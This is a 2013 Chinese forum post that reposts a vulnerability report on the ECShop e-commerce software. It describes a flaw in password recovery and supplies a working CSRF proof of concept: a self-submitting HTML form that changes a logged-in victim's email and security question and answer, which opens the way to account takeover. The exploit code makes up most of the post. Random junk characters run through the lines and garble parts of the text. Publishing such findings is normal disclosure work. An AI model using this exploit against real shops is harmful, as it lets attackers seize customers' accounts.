找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2226|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
4 c7 r5 L, ^; C$ @# m( wecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现/ a: A* ^! A$ O& x- H
; ~8 x' @" u, o1 N" |
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
7 V; D/ S- |7 x+ k9 j1 R# v: t+ W3 v5 ?0 }  B8 |
详细说明:  X, S8 g' l' o9 L
利用csrf和xss可以突破官方所说的“障碍”: c* {- r; a+ J' _" {
xss版本已经有人说明
/ G0 W4 ^' p: _" K3 D2 V这里给出csrf版本
9 M4 d8 k" S- b( \( g# k5 F; B% L5 V9 k# L9 y# d& d. ~
漏洞证明:
5 h( ~2 C! |. z% m, ]<html>" M% U; `' l1 E! O! s$ f
<body>
8 ?3 V% D* i% o# f0 O<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
: t+ O) ]0 {/ M( p7 E' |* B  i8 M$ a4 p- q<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">: g. q7 t6 N1 d' X' x) X7 g9 q
<INPUT TYPE="text" NAME="act" value="act_edit_profile">4 B5 p8 E0 A6 i3 {- V, y9 U
<INPUT TYPE="text" NAME="sel_question" value="ecshop">7 E$ Z2 f3 T  ?. I# v  A4 z
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">. j9 z. ?$ {* }0 \6 c
</body>
* c: M) p3 x/ e" a7 s<script>
( M: ~8 N( E: h2 Z4 o2 o9 kdocument.forms[0].submit();, z. z; U0 d2 o
</script>
# N- c; M7 ~* Y& b+ |* ~( T) }1 ]</html>- T! B6 j, X( G, Z. C8 B
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失- z' S; ~( n+ Z* b0 g# H  z, \& O

5 y) d2 J$ T! W+ z* {, |  I9 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表